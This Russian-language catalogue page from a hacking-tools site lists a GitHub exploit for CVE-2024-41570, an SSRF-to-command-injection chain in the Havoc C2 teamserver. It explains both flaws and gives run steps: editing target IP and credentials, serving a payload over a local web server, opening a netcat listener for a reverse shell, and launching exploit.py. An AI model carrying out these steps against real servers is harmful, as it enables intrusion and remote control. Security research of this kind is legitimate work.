Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/leo-mitch/cve-2024-41570-havoc-c2-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubleo-mitch/cve-2024-41570-havoc-c2-rce

CVE-2024-41570-Havoc-C2-RCE

Это связанное RCE в фреймворке Havoc C2 с использованием poc от github.com/chebuya и github.com/IncludeSecurity.

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Havoc-C2-RCE (CVE-2024-41570)

Это цепочка RCE (CVE-2024-41570) во фреймворке Havoc C2.

Command injection: Havoc уязвим к инъекции команд, что позволяет аутентифицированному пользователю выполнять команды на Teamserver. Затрагивает версии от 0.3 до последнего релиза 0.6. Профиль Havoc по умолчанию содержит жестко заданные пароли, поэтому оператор C2, неосторожно использующий профиль по умолчанию в публичной сети, может быть немедленно атакован.

SSRF: Эта уязвимость эксплуатируется путем подделки регистрации агента demon и его проверок для открытия TCP-сокета на teamserver и чтения/записи данных через него. Это позволяет атакующим утекать исходные IP-адреса teamserver и многое другое.

Chain: Использование SSRF для доставки полезной нагрузки с аутентифицированной инъекцией команд.

Как использовать

2025-01-19 20-01-34

root@kitploit:~
1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh

-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)

# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345

Благодарности @chebuya и @Hyperreality

Скачать инструмент